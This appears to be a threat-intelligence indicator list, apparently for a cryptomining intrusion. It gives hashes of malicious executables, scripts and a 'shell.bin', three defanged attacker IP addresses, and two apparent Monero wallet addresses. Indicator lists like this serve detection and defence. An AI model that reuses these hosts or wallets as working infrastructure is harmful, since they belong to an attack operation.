3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe
c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe
4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1
904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat
4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta
af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta
cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1
ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta
a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat
0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php
e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat
b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1
18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe
112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1
e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta
61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1
f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat
cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe

Uncategorized groups

188[.]166[.]38[.]137
91[.]121[.]87[.]10
94[.]23[.]206[.]130

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg